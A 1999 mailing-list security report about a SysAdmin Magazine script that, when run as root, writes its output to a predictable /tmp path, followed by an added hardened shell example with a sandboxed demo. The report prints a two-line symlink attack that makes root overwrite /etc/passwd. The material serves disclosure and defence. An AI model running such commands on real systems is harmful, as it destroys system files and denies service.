Security bug in a shell script in January issue of SysAdmin Magazine

Date: Mon, 4 Jan 1999 02:33:46 -0800
From: "Jan B. Koum" <[email protected]>
To: [email protected]
Subject: January SysAdmin EY script DoS bug.

/* Warning! Lame bug report ahead. */

/* This is nothing against EY. They are a good company. This
is against people who claim to be security experts and can't
write a secure script. */

        Let's make it short. SysAdmin (www.samag.com - btw, their
        DNS is broken. Isn't it ironic that they can't get their
        own systems running, yet they teach others how) magazine
        published a script in the Jan 1999 issue which, after you
        run it as root, tells you stuff about your system. Here
        are some parts of this script:

set HOSTNAME=`hostname`
set basedir=/tmp/eyscan
set OUTPUT=${basedir}/ey-${HOSTNAME}.out

        After that, output like 'ls -l /etc/passwd' is sent to

        So you know that your admin runs lame scripts as root
        and what do you do? Hmm.. gee..

% mkdir /tmp/eyscan
% ln -s /etc/passwd /tmp/eyscan/ey-`hostname`.out

        After an admin runs the script - he is toasted. A point
        to this story, kids:
        o  set basedir=/root or /var/run ..

-- Yan
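
An added example, not part of the original post or the magazine script: one way to create the report file so that a symlink planted in advance, like the one shown above, cannot redirect a write made as root. The function names and sandbox paths are hypothetical, and the demo uses constructed files in place of /etc/passwd.

```shell
#!/bin/sh
# Added example: hardened report-file creation for a script run as root.
# make_report_dir, write_report and demo_symlink_refused are hypothetical names.

# Create a fresh, unpredictably named, owner-only directory. mktemp -d fails
# instead of reusing a path that another user has already created.
make_report_dir() {
    mktemp -d "${TMPDIR:-/tmp}/eyscan.XXXXXXXXXX"
}

# Copy stdin to the file $1, refusing symlinks and existing files.
write_report() {
    out=$1
    if [ -L "$out" ] || [ -e "$out" ]; then
        echo "refusing to write: $out already exists" >&2
        return 1
    fi
    # set -C (noclobber) makes '>' fail if the path appears after the check;
    # umask 077 keeps the report readable by its owner only.
    ( umask 077; set -C; cat > "$out" ) 2>/dev/null || {
        echo "refusing to write: could not create $out" >&2
        return 1
    }
}

# Constructed demo: plant the symlink from the post inside a sandbox and check
# that the file it points to (standing in for /etc/passwd) is left untouched.
demo_symlink_refused() {
    sandbox=$(mktemp -d) || return 1
    echo "root:x:0:0" > "$sandbox/victim"
    mkdir "$sandbox/eyscan"
    ln -s "$sandbox/victim" "$sandbox/eyscan/ey-host.out"
    rc=0
    echo "scan output" | write_report "$sandbox/eyscan/ey-host.out" 2>/dev/null || rc=$?
    content=$(cat "$sandbox/victim")
    rm -rf "$sandbox"
    [ "$rc" -ne 0 ] && [ "$content" = "root:x:0:0" ]
}

demo_symlink_refused && echo "symlink refused, target unchanged"
```

Writing under a directory that only root can modify, as the post suggests, removes the need for the symlink check; the checks here matter when the script must use a shared location such as /tmp.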